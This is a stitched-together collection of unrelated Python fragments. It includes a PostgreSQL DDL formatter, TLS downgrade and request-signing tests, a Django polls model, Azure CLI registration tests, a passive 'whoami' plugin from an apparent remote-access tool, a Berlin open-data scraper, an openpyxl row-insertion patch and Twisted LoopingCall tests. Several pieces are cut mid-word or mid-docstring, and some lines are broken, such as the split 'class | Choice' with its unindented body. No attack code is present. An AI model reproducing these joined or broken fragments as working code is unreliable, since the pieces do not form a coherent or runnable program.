    """Table statement formatter."""

    __slots__ = ()

    def __new__(cls, name: str, columns, primary_key, schema='public'):
        # Defaulting the schema here keeps the constructor signature
        # backward compatible with callers that omit it.
        return super(Table, cls).__new__(cls, name, columns, primary_key, schema)

    def create_statement(self):
        """CREATE TABLE statement for the schema-qualified name."""
        return compile_create_table(self.qualified_name,
                                    self.column_statement,
                                    self.primary_key_statement)

    def drop_statement(self):
        """DROP TABLE for the schema-qualified name."""
        return 'DROP TABLE IF EXISTS {};'.format(self.qualified_name)

    def create_temporary_statement(self):
        """Temporary Table Statement formatter (temp tables are unqualified)."""
        return compile_create_temporary_table(self.name,
                                              self.column_statement,
                                              self.primary_key_statement)

    def drop_temporary_statement(self):
        """DROP TABLE for the bare (unqualified) table name."""
        return 'DROP TABLE IF EXISTS {};'.format(self.name)

    @property
    def qualified_name(self):
        return compile_qualified_name(self.name, schema=self.schema)

    @property
    def column_names(self):
        return [col.name for col in self.columns]

    @property
    def primary_key_columns(self):
        return self.primary_key.column_names

    @property
    def column_statement(self):
        return ' '.join(col.create_statement() for col in self.columns)

    @property
    def primary_key_statement(self):
        return self.primary_key.create_statement()
class Column(namedtuple('Column', 'name data_type nullable')):
    """Column DDL fragment formatter; columns are NOT NULL by default."""

    __slots__ = ()

    def __new__(cls, name: str, data_type: str, nullable=False):
        return super(Column, cls).__new__(cls, name, data_type, nullable)

    def create_statement(self):
        """Compile this column's DDL fragment."""
        return compile_column(self.name, self.data_type, self.nullable)
class PrimaryKey(namedtuple('PrimaryKey', ['column_names'])):
    """Primary-key DDL fragment formatter over an ordered column list."""

    __slots__ = ()

    def __new__(cls, column_names: list):
        return super(PrimaryKey, cls).__new__(cls, column_names)

    def create_statement(self):
        """Compile the PRIMARY KEY clause for these columns."""
        return compile_primary_key(self.column_names)
class View:
    """Postgresql View statement formatter.

    Attributes
    ----------
    name : view name
    statement: the select or join statement the view is based on.
    """

    def __init__(self, name: str, statement: str):
        self.name = name
        self.statement = statement

    def create_statement(self):
        """CREATE VIEW wrapping the stored SELECT/JOIN statement."""
        return 'CREATE VIEW {name} AS {statement};'.format(
            name=self.name, statement=self.statement)

    def drop_statement(self):
        """DROP VIEW for this view's name."""
        return 'DROP VIEW IF EXISTS {};'.format(self.name)
def make_delete_table(table: Table, delete_prefix='delete_from__') -> Table:
    """Table referencing a delete from using primary key join."""
    pkey = table.primary_key
    wanted = set(pkey.column_names)
    # Keep only the key columns; the delete-join table needs nothing else.
    key_columns = [col for col in table.columns if col.name in wanted]
    # NOTE(review): the derived table is built with the default schema
    # ('public') rather than table.schema -- confirm this is intentional.
    return Table(delete_prefix + table.name, key_columns, pkey)
def split_qualified_name(qualified_name: str, schema='public'):
    """Split 'schema.table' into a (schema, table) pair.

    An unqualified name falls back to the *schema* default.  Splitting on
    the first dot only keeps names that contain further dots intact
    instead of raising ValueError on unpacking.
    """
    if '.' in qualified_name:
        schema, table = qualified_name.split('.', 1)
    else:
        table = qualified_name
    return schema, table
def order_table_columns(table: Table, column_names: list) -> Table:
    """Record table column(s) and primary key columns by specified order."""
    current = table.column_names
    # Re-select the column objects in the requested order.
    ordered = [table.columns[current.index(name)] for name in column_names]
    # The primary key keeps only (and reorders) columns that appear in it.
    pkey_names = [name for name in column_names
                  if name in table.primary_key_columns]
    return Table(table.name, ordered, PrimaryKey(pkey_names), table.schema)
|
from oplogreplayer im | port OplogReplayer | |
import os
import pytest
import requests
from keybar.client import TLS12SSLAdapter
from keybar.tests.helpers import LiveServerTest
from keybar.tests.factories.user import UserFactory
from keybar.tests.factories.device import (
AuthorizedDeviceFactory, PRIVATE_KEY, PRIVATE_KEY2)
from keybar.utils.http import InsecureTransport
def verify_rejected_ssl(url):
    """
    The utility verifies that the url raises SSLError if the remote server
    supports only weak ciphers.
    """
    session = requests.Session()
    session.mount('https://', TLS12SSLAdapter())
    with pytest.raises(requests.exceptions.SSLError):
        session.get(url)
    return True
@pytest.mark.django_db(transaction=True)
class TestTestClient(LiveServerTest):
    """End-to-end TLS and request-signing checks for the keybar client."""

    def test_url_must_be_https(self):
        """Plain http:// URLs are rejected before any request is made."""
        api = self.get_client(None, None)
        with pytest.raises(InsecureTransport):
            api.get('http://fails.xy')

    def test_simple_unauthorized(self):
        """A device without a signing key gets a 401."""
        owner = UserFactory.create()
        dev = AuthorizedDeviceFactory.create(user=owner)
        api = self.get_client(dev.id, None)
        resp = api.get('{0}/api/dummy/'.format(self.liveserver.url))
        assert resp.status_code == 401

    def test_simple_authorized(self):
        """A superuser device signing with the right key gets the payload."""
        owner = UserFactory.create(is_superuser=True)
        dev = AuthorizedDeviceFactory.create(user=owner)
        api = self.get_client(dev.id, PRIVATE_KEY)
        resp = api.get('{0}/api/dummy/'.format(self.liveserver.url))
        assert resp.status_code == 200
        assert resp.content == b'"{\\"dummy\\": \\"ok\\"}"'

    def test_simple_wrong_device_secret(self, settings):
        """Signing with the wrong private key is rejected with a 401."""
        owner = UserFactory.create(is_superuser=True)
        dev = AuthorizedDeviceFactory.create(user=owner)
        api = self.get_client(dev.id, PRIVATE_KEY2)
        resp = api.get('{0}/api/dummy/'.format(self.liveserver.url))
        assert resp.status_code == 401
        assert resp.json()['detail'] == 'Error decoding signature.'

    def test_to_server_without_tls_10(self, allow_offline):
        """
        Verify that connection is possible to SFDC servers that disabled TLS 1.0
        """
        session = requests.Session()
        session.mount('https://', TLS12SSLAdapter())
        resp = session.get('https://tls1test.salesforce.com/s/')
        assert resp.status_code == 200

    def test_under_downgrade_attack_to_ssl_3(self, allow_offline):
        """
        Verify that the connection is rejected if the remote server (or man
        in the middle) claims that SSLv3 is the best supported protocol.
        """
        assert verify_rejected_ssl('https://ssl3.zmap.io/sslv3test.js')

    def test_protocols_by_ssl_labs(self, allow_offline):
        """SSL Labs' client test reports good protocol support."""
        session = requests.Session()
        session.mount('https://', TLS12SSLAdapter())
        resp = session.get('https://www.ssllabs.com/ssltest/viewMyClient.html')
        assert 'Your user agent has good protocol support' in resp.text

    @pytest.mark.skipif(os.environ.get('ON_TRAVIS', None) == 'true', reason='on travis')
    def test_sni_suport(self, allow_offline):
        """The adapter sends SNI and negotiates TLS 1.2."""
        session = requests.Session()
        session.mount('https://', TLS12SSLAdapter())
        resp = session.get('https://sni.velox.ch/')
        assert 'sent the following TLS server name indication extension' in resp.text
        assert 'negotiated protocol: TLSv1.2' in resp.text

    @pytest.mark.skipif(os.environ.get('ON_TRAVIS', None) == 'true', reason='on travis')
    def test_vulnerability_logjam_by_ssl_labs(self, allow_offline):
        """SSL Labs' Logjam simulation endpoint must be rejected."""
        assert verify_rejected_ssl('https://www.ssllabs.com:10445/')

    def test_vulnerability_freak_by_ssl_labs(self, allow_offline):
        """SSL Labs' FREAK simulation endpoint must be rejected."""
        assert verify_rejected_ssl('https://www.ssllabs.com:10444/')

    def test_vulnerability_osx_by_ssl_labs(self, allow_offline):
        """SSL Labs' OS X TLS-bug simulation endpoint must be rejected."""
        assert verify_rejected_ssl('https://www.ssllabs.com:10443/')
|
from django.db import models
from django.utils import timezone
import datetime
# Create your models here.
class Question(models.Model):
    """A poll question with its publication timestamp."""
    question_text = models.CharField(max_length=200)
    pub_date = models.DateTimeField('date published')

    def __str__(self):              # __unicode__ on Python 2
        return self.question_text

    def was_published_recently(self):
        """True when the question was published within the last day."""
        cutoff = timezone.now() - datetime.timedelta(days=1)
        return self.pub_date >= cutoff
    # Admin list-display metadata for the method above.
    was_published_recently.admin_order_field = 'pub_date'
    was_published_recently.boolean = True
    was_published_recently.short_description = 'Published recently?'
class | Choice(models.Model):
question = models.ForeignKey(Question)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __str__(self): # __unicode__ on Python 2
return self.choice_text
|
e operation to get a virtual machine.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param opt_param: Used to verify reflection correctly
identifies optional params.
:type opt_param: object
:param expand: The expand expression to apply on the operation.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param boolean raw: returns the direct response alongside the
deserialized response
:rtype: VirtualMachine
:rtype: msrest.pipeline.ClientRawResponse if raw=True
"""
pass
def test_register_cli_argument(self):
command_table.clear()
cli_command(None, 'test register sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__))
register_cli_argument('test register sample-vm-get', 'vm_name', CliArgumentType(
options_list=('--wonky-name', '-n'), metavar='VMNAME', help='Completely WONKY name...',
required=False
))
command_table['test register sample-vm-get'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_metadata = command_table['test register sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 4, 'We expected exactly 4 arguments')
some_expected_arguments = {
'resource_group_name': CliArgumentType(dest='resource_group_name', required=True),
'vm_name': CliArgumentType(dest='vm_name', required=False),
}
for probe in some_expected_arguments:
existing = next(arg for arg in command_metadata.arguments if arg == probe)
self.assertDictContainsSubset(some_expected_arguments[existing].settings,
command_metadata.arguments[existing].options)
self.assertEqual(command_metadata.arguments['vm_name'].options_list, ('--wonky-name', '-n'))
def test_register_command(self):
command_table.clear()
cli_command(None, 'test command sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_table['test command sample-vm-get'].load_arguments()
command_metadata = command_table['test command sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 4, 'We expected exactly 4 arguments')
some_expected_arguments = {
'resource_group_name': CliArgumentType(dest='resource_group_name',
required=True,
help='The name of the resource group.'),
'vm_name': CliArgumentType(dest='vm_name',
required=True,
help='The name of the virtual machine.'),
'opt_param': CliArgumentType(required=False,
help='Used to verify reflection correctly identifies optional params.'), # pylint: disable=line-too-long
'expand': CliArgumentType(required=False,
help='The expand expression to apply on the operation.')
}
for probe in some_expected_arguments:
existing = next(arg for arg in command_metadata.arguments if arg == probe)
self.assertDictContainsSubset(some_expected_arguments[existing].settings,
command_metadata.arguments[existi | ng].options)
self.assertEqual(command_metadata.arguments['resource_group_name'].options_list,
['--resource-group-name'])
def test_register_command_from_extension(self):
command_table.clear()
# A standard command
cli_command(None, 'hello world', 'dumm | y_operation', None)
self.assertEqual(len(command_table), 1)
self.assertEqual(command_table['hello world'].command_source, None)
command_table.clear()
# A command from an extension
cli_command('{}myextension'.format(EXTENSIONS_MOD_PREFIX), 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
cmd_source = command_table['hello world'].command_source
self.assertTrue(isinstance(cmd_source, ExtensionCommandSource))
self.assertFalse(cmd_source.overrides_command)
command_table.clear()
# A command from an extension that overrides the original command
cli_command(None, 'hello world', 'dummy_operation', None)
cli_command('{}myextension'.format(EXTENSIONS_MOD_PREFIX), 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
cmd_source = command_table['hello world'].command_source
self.assertTrue(isinstance(cmd_source, ExtensionCommandSource))
self.assertTrue(cmd_source.overrides_command)
command_table.clear()
def test_register_cli_argument_with_overrides(self):
command_table.clear()
global_vm_name_type = CliArgumentType(
options_list=('--foo', '-f'), metavar='FOO', help='foo help'
)
derived_vm_name_type = CliArgumentType(base_type=global_vm_name_type,
help='first modification')
cli_command(None, 'test vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
cli_command(None, 'test command vm-get-1',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
cli_command(None, 'test command vm-get-2',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
register_cli_argument('test', 'vm_name', global_vm_name_type)
register_cli_argument('test command', 'vm_name', derived_vm_name_type)
register_cli_argument('test command vm-get-2', 'vm_name', derived_vm_name_type,
help='second modification')
command_table['test vm-get'].load_arguments()
command_table['test command vm-get-1'].load_arguments()
command_table['test command vm-get-2'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 3,
'We expect exactly three commands in the command table')
command1 = command_table['test vm-get'].arguments['vm_name']
command2 = command_table['test command vm-get-1'].arguments['vm_name']
command3 = command_table['test command vm-get-2'].arguments['vm_name']
self.assertTrue(command1.options['help'] == 'foo help')
self.assertTrue(command2.options['help'] == 'first modification')
self.assertTrue(command3.options['help'] == 'second modification')
command_table.clear()
def test_register_extra_cli_argument(self):
command_table.clear()
cli_command(None, 'test command sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
register_extra_cli_argument(
'test command sample-vm-get', 'added_param', options_list=('--added-param',),
metavar='ADDED', help='Just added this right now!', required=True
)
command_table['test command sample-vm-get'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_metadata = command_table['test command sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 5, 'We expected exactly 5 arguments')
some_expected_arguments = {
'adde |
"""Pri | nt effective userid
SYNOPSIS:
whoami
DESCRIPTION:
Print the user name associated with current remote
server access rights.
* PASSIVE PLUGIN:
No requests are sent to server, as current user
is known by $USER environment variable (`env USER`);
AUTHOR:
nil0x42 <http://goo.gl/kb | 2wf>
"""
from api import environ
print(environ['USER'])
|
import json, io, re, requests
from bs4 import BeautifulSoup
from datetime import datetime
def get_datasets(url):
    """Yield (href, title) pairs for every entry of a paginated listing.

    *url* is a format string with one ``{}`` slot for the page number.
    The first request (page 0) is only used to discover the index of the
    last page from the pager's final link.
    """
    first_page = requests.get(url.format(0))
    first_soup = BeautifulSoup(first_page.text)
    pager_href = first_soup.select('#block-system-main a')[-1]['href']
    last_page = int(re.match(r'.*page=(.*)', pager_href).group(1))
    for page in range(last_page + 1):
        print( '[DEBUG] page:', page )
        listing = BeautifulSoup(requests.get(url.format(page)).text)
        for anchor in listing.select('h2 a'):
            yield (anchor['href'], anchor.text)
def get_metadata(url):
    """Scrape the metadata fields of a single dataset/document page.

    :param url: fully-formed URL of the detail page.
    :return: dict of field label -> value, plus the bookkeeping keys
             ``_url``, ``_collection_date`` and ``tags``.
    """
    r = requests.get(url)
    soup = BeautifulSoup(r.text)
    metadata = dict()
    # BUG FIX: the original stored url.format(d), which re-formatted an
    # already-final URL and silently depended on the module-level loop
    # variable `d`. The caller passes the complete URL; store it as-is.
    metadata['_url'] = url
    metadata['_collection_date'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    for elem in soup.select('.datasetview_container .datasetview_row'):
        for field in elem.select('.field'):
            # Label text ends with ": " -- strip those two characters.
            label = field.select('.field-label')[0].text[:-2]
            item_list = list()
            item = field.select('.field-item')
            if label == 'Website':
                # Keep the link target, not the link text.
                metadata[label] = item[0].select('a')[0]['href']
            elif len(item) == 0:
                # No plain field items: value is a list of tag links.
                items = elem.select('.tag_list a')
                for i in items:
                    item_list.append(i.text.strip())
                metadata[label] = item_list
            else:
                metadata[label] = item[0].text.strip()
    tags = set()
    for elem in soup.select('.tag_list a'):
        tags.add(elem.text.strip())
    metadata['tags'] = list(tags)
    return metadata
if __name__ == '__main__':
    # Crawl both listings (datasets and documents) of daten.berlin.de,
    # collect per-entry metadata, then dump everything as JSON and CSV.
    #
    # NOTE(review): get_metadata() reads the module-global loop variable `d`
    # (via url.format(d)), so renaming `d` or moving these loops into a
    # function would break it -- confirm before refactoring.
    base_url = 'http://daten.berlin.de{}'
    datasets_url = 'http://daten.berlin.de/datensaetze?page={}'
    documents_url = 'http://daten.berlin.de/dokumente?page={}'
    all_labels = set()      # union of every metadata key seen (CSV header)
    all_metadata = list()   # one metadata dict per crawled entry
    done_datasets = set()   # hrefs already crawled, to de-duplicate
    # iterate over all dataset urls
    for d, t in get_datasets(datasets_url):
        if d in done_datasets:
            print('skip', d)
            continue # skip datasets
        m = get_metadata(base_url.format(d))
        m['_type'] = 'dataset'
        m['_title'] = t
        all_metadata.append(m)
        for k in m.keys(): all_labels.add(k)
        print(json.dumps(m, sort_keys=1, ensure_ascii=False))
        done_datasets.add(d)
    # iterate over all document urls
    for d, t in get_datasets(documents_url):
        if d in done_datasets:
            print('skip', d)
            continue # skip datasets
        m = get_metadata(base_url.format(d))
        m['_type'] = 'document'
        m['_title'] = t
        all_metadata.append(m)
        for k in m.keys(): all_labels.add(k)
        print(json.dumps(m, sort_keys=1, ensure_ascii=False))
        done_datasets.add(d)
    # write json file
    with io.open('daten-berlin_metadata.json', 'w', encoding='utf8') as json_file:
        json_file.write((json.dumps(all_metadata, indent=2, sort_keys=True, ensure_ascii=False)))
    # write csv
    # Header row: every label sorted, ';'-separated; one row per entry with
    # empty cells for labels the entry does not have.
    with open('daten-berlin_metadata.csv', 'wb') as csv_file:
        for l in sorted(all_labels):
            csv_file.write((l + ';').encode('utf8'))
        csv_file.write('\n'.encode('utf8'))
        for m in all_metadata:
            for l in sorted(all_labels):
                if l in m:
                    csv_file.write(str(m[l]).encode('utf8'))
                csv_file.write(';'.encode('utf8'))
            csv_file.write('\n'.encode('utf8'))
# #!/usr/bin/env python
#
# import nlopt # THIS IS NOT A P | ACKAGE!
# import numpy as np
#
# print(('nlopt version='+nlopt.__version__))
#
# def f(x, grad):
# F=x[0]
# L=x[1]
# E=x[2]
# I=x[3]
# D=F*L**3/(3.*E*I)
# return D
#
# n = 4
# opt = nlopt.opt(nlopt.LN_COBYLA, n)
# opt.set_min_objective(f)
# lb = np.array([40., 50., 30e3, 1.])
# ub = np.array([60., 60., 40e3, 10.])
# x = (lb+ub)/2.
# opt.set_lower_bounds(lb)
# opt.set_upper_bounds(ub)
# opt.set_xtol_rel(1e-3)
# opt.set_ftol_rel(1e-3)
# xopt = opt.optimize(x)
#
# opt_val = op | t.last_optimum_value()
# result = opt.last_optimize_result()
# print(('opt_result='+str(result)))
# print(('optimizer='+str(xopt)))
# print(('opt_val='+str(opt_val)))
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright (C) 2010-2013, Ryan Fan <ryan.fan@oracle.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Library General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
from __future__ import absolute_import
import os
import sys
import logging
logger = logging.getLogger(__name__)
from sdk.constants import *
from sdk.utils import load_class
from sdk.plugin.base import BasePlugin
from sdk.plugin.config import BasePluginConfig
class FSPluginHelper(object):
    """
    Filesystem plugin helper: discovers plugin packages under the
    application's plugins directory and dynamically loads their plugin
    and plugin-config classes.
    """
    def __init__(self, app):
        super(FSPluginHelper, self).__init__()
        self.plugins_dir = app.config.plugins_dir
        # make sure plugins dir is in python search path
        sys.path.insert(1, self.plugins_dir)

    def __is_valid_plugin_module(self, plugin_name):
        """Return True when a plugin.py exists inside the plugin's package."""
        plugin_file = os.path.join(self.plugins_dir, "{0}".format(plugin_name.lower()), "plugin.py")
        if not os.path.exists(plugin_file):
            # print() with a single argument is valid on both Python 2 and 3.
            print("no plugin.py file under {0} plugin package".format(plugin_name))
            return False
        return True

    def fs_get_plugin_class(self, plugin_name):
        """
        Dynamically retrieve plugin class from filesystem
        @param plugin_name: plugin name, it is a package name under plugins base directory
        @return cls: valid Plugin class, or None when it is not a BasePlugin
        """
        # here must convert plugin name to lowercased one
        module_path = "{0}.plugin".format(plugin_name.lower())
        # The original wrapped this in try/except only to `raise e`, which
        # truncated the traceback on Python 2; let errors propagate as-is.
        cls = load_class(module_path, WXMP_PLUGIN_CLASS_NAME)
        if not issubclass(cls, BasePlugin):
            print("Object: {0} is not a subclass of BasePlugin".format(cls))
            return None
        return cls

    def fs_get_plugin_config_class(self, plugin_name):
        """
        Dynamically retrieve plugin config class from filesystem
        @param plugin_name: plugin name, it is a package name under plugins base directory
        @return cls: valid PluginConfig class, or None when missing/invalid
        """
        if not self.__is_valid_plugin_module(plugin_name):
            print("Invalid plugin module: {0}".format(plugin_name))
            return None
        try:
            # here must convert plugin name to lowercased one
            module_path = "{0}.plugin".format(plugin_name.lower())
            cls = load_class(module_path, WXMP_PLUGIN_CONFIG_CLASS_NAME)
            if not issubclass(cls, BasePluginConfig):
                print("Object: {0} is not a subclass of BasePluginConfig".format(cls))
                return None
        except Exception as e:
            # A plugin without a config class is legal: warn and move on.
            print("Warning: No {0} plugin config class because of: {1}".format(plugin_name, e))
            return None
        return cls

    def __build_meta_dict(self, plugin_instance):
        """
        Build meta dict from plugin instance as below:
        { 'name':'x','version': '0.1', ...}
        @param: plugin instance
        @return: meta dict
        """
        # Read the meta attributes off the concrete plugin class itself
        # (its own __dict__, not inherited ones), keyed by BasePlugin.meta_keys.
        meta_dict = {}
        for k in BasePlugin.meta_keys:
            meta_dict[k] = plugin_instance.__class__.__dict__[k]
        return meta_dict

    def fs_get_meta_all(self):
        """
        Get all plugins meta list from filesystem
        """
        meta_list = []
        for pinstance in self.fs_get_plugin_instances_all():
            meta_list.append(self.__build_meta_dict(pinstance))
        return meta_list

    def fs_get_meta(self, plugin_name):
        """
        Get specific plugin's meta dict by plugin name
        """
        plugin_instance = self.fs_get_plugin_instance(plugin_name)
        if not plugin_instance:
            return {}
        return self.__build_meta_dict(plugin_instance)

    def fs_get_plugin_instance(self, plugin_name):
        """Instantiate the plugin class for plugin_name, or None when absent."""
        plugin_class = self.fs_get_plugin_class(plugin_name)
        if not plugin_class:
            return None
        # Construction errors propagate unchanged (the old try/raise-e
        # wrapper added nothing but a truncated Python 2 traceback).
        return plugin_class()

    def fs_get_plugin_instances_all(self):
        """
        Probe plugin package deployed in filesystem and try to initialize plugin instances
        @return: the list of plugin instance
        """
        # get the top-level dirs under the plugins parent dir;
        # next(...) works on both Python 2 and 3, unlike .next().
        plugin_instance_list = []
        plugin_name_list = next(os.walk(self.plugins_dir))[1]
        for plugin_name in plugin_name_list:
            plugin_instance = self.fs_get_plugin_instance(plugin_name)
            if plugin_instance:
                plugin_instance_list.append(plugin_instance)
        return plugin_instance_list
|
#!/usr/bin/env python
import copy
import datetime as dt
import re
from decimal import Decimal, InvalidOperation
from openpyxl import *
from openpyxl.cell import Cell
from openpyxl.utils import get_column_letter
from openpyxl.worksheet import Worksheet
# OPENPYXL WITH INSERT ROW
# ----------------------------------------------------------------------------------------------------
def insert_rows(self, row_idx, cnt, above=False, copy_style=True, fill_formulae=True):
    """Inserts new (empty) rows into worksheet at specified row index.
    :param self: Class object
    :param row_idx: Row index specifying where to insert new rows.
    :param cnt: Number of rows to insert.
    :param above: Set True to insert rows above specified row index.
    :param copy_style: Set True if new rows should copy style of immediately above row.
    :param fill_formulae: Set True if new rows should take on formula from immediately above row, filled with references new to rows.
    Usage:
    * insert_rows(2, 10, above=True, copy_style=False)
    """
    # Matches one spreadsheet reference like "$A$12" / "B3", capturing the
    # column and row parts (with optional absolute-reference "$" markers).
    CELL_RE = re.compile("(?P<col>\$?[A-Z]+)(?P<row>\$?\d+)")
    row_idx = row_idx - 1 if above else row_idx
    def replace(m):
        # re.sub callback: bump the row number of any reference that points
        # below the insertion point, preserving a leading "$" if present.
        row = m.group('row')
        prefix = "$" if row.find("$") != -1 else ""
        row = int(row.replace("$", ""))
        row += cnt if row > row_idx else 0
        return m.group('col') + prefix + str(row)
    # First, we shift all cells down cnt rows...
    old_cells = set()
    old_fas = set()
    new_cells = dict()
    new_fas = dict()
    for c in self._cells.values():
        old_coor = c.coordinate
        # Shift all references to anything below row_idx
        if c.data_type == Cell.TYPE_FORMULA:
            c.value = CELL_RE.sub(
                replace,
                c.value
            )
            # Here, we need to properly update the formula references to reflect new row indices
            if old_coor in self.formula_attributes and 'ref' in self.formula_attributes[old_coor]:
                self.formula_attributes[old_coor]['ref'] = CELL_RE.sub(
                    replace,
                    self.formula_attributes[old_coor]['ref']
                )
        # Do the magic to set up our actual shift
        if c.row > row_idx:
            old_coor = c.coordinate
            old_cells.add((c.row, c.col_idx))
            c.row += cnt
            new_cells[(c.row, c.col_idx)] = c
            if old_coor in self.formula_attributes:
                old_fas.add(old_coor)
                fa = self.formula_attributes[old_coor].copy()
                new_fas[c.coordinate] = fa
    # Apply the shift: remove cells at their old keys, re-insert under the
    # new (row, col) keys, and move formula attributes along with them.
    for coor in old_cells:
        del self._cells[coor]
    self._cells.update(new_cells)
    for fa in old_fas:
        del self.formula_attributes[fa]
    self.formula_attributes.update(new_fas)
    # Next, we need to shift all the Row Dimensions below our new rows down by cnt...
    # (iterate bottom-up so a dimension is never overwritten before it is copied)
    for row in range(len(self.row_dimensions) - 1 + cnt, row_idx + cnt, -1):
        new_rd = copy.copy(self.row_dimensions[row - cnt])
        new_rd.index = row
        self.row_dimensions[row] = new_rd
        del self.row_dimensions[row - cnt]
    # Now, create our new rows, with all the pretty cells
    row_idx += 1
    for row in range(row_idx, row_idx + cnt):
        # Create a Row Dimension for our new row
        new_rd = copy.copy(self.row_dimensions[row - 1])
        new_rd.index = row
        self.row_dimensions[row] = new_rd
        for col in range(1, self.max_column):
            col = get_column_letter(col)
            cell = self.cell('%s%d' % (col, row))
            cell.value = None
            source = self.cell('%s%d' % (col, row - 1))
            if copy_style:
                cell.number_format = source.number_format
                cell.font = source.font.copy()
                cell.alignment = source.alignment.copy()
                cell.border = source.border.copy()
                cell.fill = source.fill.copy()
            if fill_formulae and source.data_type == Cell.TYPE_FORMULA:
                s_coor = source.coordinate
                if s_coor in self.formula_attributes and 'ref' not in self.formula_attributes[s_coor]:
                    fa = self.formula_attributes[s_coor].copy()
                    self.formula_attributes[cell.coordinate] = fa
                # print("Copying formula from cell %s%d to %s%d"%(col,row-1,col,row))
                # Rewrite row-relative references in the copied formula so
                # they point at the new row instead of the source row.
                cell.value = re.sub(
                    "(\$?[A-Z]{1,3}\$?)%d" % (row - 1),
                    lambda m: m.group(1) + str(row),
                    source.value
                )
                cell.data_type = Cell.TYPE_FORMULA
    # Check for Merged Cell Ranges that need to be expanded to contain new cells
    for cr_idx, cr in enumerate(self.merged_cell_ranges):
        self.merged_cell_ranges[cr_idx] = CELL_RE.sub(
            replace,
            cr
        )
# Monkey-patch the helper onto openpyxl's Worksheet class.
Worksheet.insert_rows = insert_rows
# ----------------------------------------------------------------------------------------------------
# END OPENPYXL
# MISC
# ----------------------------------------------------------------------------------------------------
def to_bool(data):
    """Parse the strings "0"/"false" and "1"/"true" (case-insensitively).

    Anything else -- including non-string input -- yields NotImplemented so
    callers can distinguish "unparseable" from a real boolean.
    """
    if isinstance(data, str):
        lowered = data.lower()
        if lowered in ("0", "false"):
            return False
        if lowered in ("1", "true"):
            return True
    return NotImplemented
def to_date_format(string):
    """Parse a 'dd/mm/YYYY[ <time>]' string into a datetime.

    Any trailing time component is discarded; returns None when the date
    part does not match the expected format.
    """
    date_part = string.partition(' ')[0]
    try:
        return dt.datetime.strptime(date_part, '%d/%m/%Y')
    except ValueError:
        return None
def to_dec(data):
    """Convert *data* to Decimal, falling back to Decimal('0') on bad input.

    Also catches TypeError so that unconvertible types (e.g. None) take the
    same safe fallback instead of crashing -- Decimal(None) raises TypeError,
    not InvalidOperation.
    """
    try:
        return Decimal(data)
    except (InvalidOperation, TypeError):
        return Decimal('0')
# ----------------------------------------------------------------------------------------------------
# END MISC
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.trial import unittest
from twisted.internet import task, reactor, defer
from twisted.python import failure
class TestableLoopingCall(task.LoopingCall):
    """A LoopingCall driven by a fake Clock instead of the global reactor."""
    def __init__(self, clock, *a, **kw):
        super(TestableLoopingCall, self).__init__(*a, **kw)
        # Route LoopingCall's internal scheduling hooks to the fake clock.
        # The LoopingCall instance itself is the callable the clock fires.
        self._callLater = lambda delay: clock.callLater(delay, self)
        self._seconds = clock.seconds
class FakeDelayedCall(object):
    """Records one scheduled call (time, callable, arguments) for the fake
    Clock; supports being invoked, printed, and cancelled."""

    def __init__(self, when, clock, what, a, kw):
        self.when = when
        self.clock = clock
        self.what = what
        self.a = a
        self.kw = kw

    def __call__(self):
        func, args, kwargs = self.what, self.a, self.kw
        return func(*args, **kwargs)

    def __repr__(self):
        return "<FakeDelayedCall of %r>" % (self.what,)

    def cancel(self):
        # Unschedule by removing the (time, call) pair the Clock stored.
        self.clock.calls.remove((self.when, self))
class Clock(object):
    """Deterministic stand-in for the reactor clock: time only moves when
    adjust()/pump() say so, and queued calls fire from runUntilCurrent()."""

    rightNow = 0.0

    def __init__(self):
        self.calls = []

    def seconds(self):
        return self.rightNow

    def callLater(self, when, what, *a, **kw):
        fire_at = self.seconds() + when
        delayed = FakeDelayedCall(fire_at, self, what, a, kw)
        self.calls.append((fire_at, delayed))
        return delayed

    def adjust(self, amount):
        self.rightNow += amount

    def runUntilCurrent(self):
        # Fire queued calls, oldest first, until none are due yet.
        while self.calls and self.calls[0][0] <= self.seconds():
            _, delayed = self.calls.pop(0)
            delayed()

    def pump(self, timings):
        # Advance time by each interval in order, firing due calls after
        # every step; the queue is ordered once up front.
        self.calls.sort()
        for interval in list(timings):
            self.adjust(interval)
            self.runUntilCurrent()
class TestException(Exception):
    """Exception raised deliberately by the test callables below."""
    pass
class LoopTestCase(unittest.TestCase):
    """Tests for task.LoopingCall driven entirely by the fake Clock."""
    def testBasicFunction(self):
        # Arrange to have time advanced enough so that our function is
        # called a few times.
        # Only need to go to 2.5 to get 3 calls, since the first call
        # happens before any time has elapsed.
        timings = [0.05, 0.1, 0.1]
        clock = Clock()
        L = []
        def foo(a, b, c=None, d=None):
            L.append((a, b, c, d))
        lc = TestableLoopingCall(clock, foo, "a", "b", d="d")
        D = lc.start(0.1)
        theResult = []
        def saveResult(result):
            theResult.append(result)
